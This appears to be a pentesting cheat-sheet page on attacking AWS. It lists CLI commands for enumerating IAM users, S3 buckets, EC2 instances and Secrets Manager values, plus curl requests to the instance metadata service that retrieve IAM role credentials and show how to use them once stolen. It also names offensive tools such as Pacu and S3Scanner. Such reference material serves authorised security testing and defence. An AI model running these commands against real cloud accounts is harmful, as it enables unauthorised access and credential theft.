Cloud Security A10 | SSRF → Cloud Metadata A01 | Broken Access Control

AWS Pentesting

AWS environments are often compromised through misconfigured IAM permissions, exposed S3 buckets, and Server-Side Request Forgery (SSRF) attacks targeting the Instance Metadata Service (IMDS).

Initial Access & Enumeration

AWS CLI Configuration.

bash

aws configure
# Enter Access Key ID, Secret Access Key, Region

Check current identity.

bash

aws sts get-caller-identity

Enumerate IAM users and roles.

bash

aws iam list-users
aws iam list-roles
aws iam list-groups

Get user details.

bash

aws iam get-user --user-name target-user
aws iam list-attached-user-policies --user-name target-user
aws iam list-user-policies --user-name target-user

Enumerate S3 buckets.

bash

aws s3 ls
aws s3 ls s3://bucket-name --recursive

Check for public buckets (unauthenticated).

bash

curl https://bucket-name.s3.amazonaws.com/
aws s3 ls s3://bucket-name --no-sign-request

EC2 enumeration.

bash

aws ec2 describe-instances
aws ec2 describe-security-groups
aws ec2 describe-vpcs

Lambda functions.

bash

aws lambda list-functions
aws lambda get-function --function-name target-function

Secrets Manager.

bash

aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id secret-name

Metadata Service Exploitation

EC2 Instance Metadata Service (IMDS) v1 - Exploitable via SSRF.

Get instance identity.

bash

curl http://169.254.169.254/latest/meta-data/

Get IAM role credentials.

bash

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME

Response contains AccessKeyId, SecretAccessKey, Token.

json

# Response format:
# {
#   "Code" : "Success",
#   "LastUpdated" : "...",
#   "Type" : "AWS-HMAC",
#   "AccessKeyId" : "ASIA...",
#   "SecretAccessKey" : "...",
#   "Token" : "...",
#   "Expiration" : "..."
# }

Use stolen credentials.

bash

export AWS_ACCESS_KEY_ID="ASIAXXX"
export AWS_SECRET_ACCESS_KEY="xxx"
export AWS_SESSION_TOKEN="xxx"

IMDSv2 (requires token).

bash

TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/

AWS Tools

Pacu

Exploitation

Docs

The AWS exploitation framework. Designed for testing the security of Amazon Web Services environments.

Installation

bash

pip3 install pacu

enumerate-iam

Enumeration

Docs

Brute force enumeration of AWS IAM permissions.

Installation

bash

pip install enumerate-iam

S3Scanner

Scanning

Docs

Scan for open S3 buckets and dump the contents.

Installation

bash

pip install s3scanner

CloudMapper

Visualization

Docs

Analyze your AWS environment. Helps you create network diagrams and audit security.

Installation

bash

pip install cloudmapper

AWS Pentesting

Initial Access & Enumeration

Metadata Service Exploitation

AWS Tools

Pacu

enumerate-iam

S3Scanner

CloudMapper

Related Topics

← Back to Cloud Pentesting

Azure Pentesting

GCP Pentesting

Kubernetes Security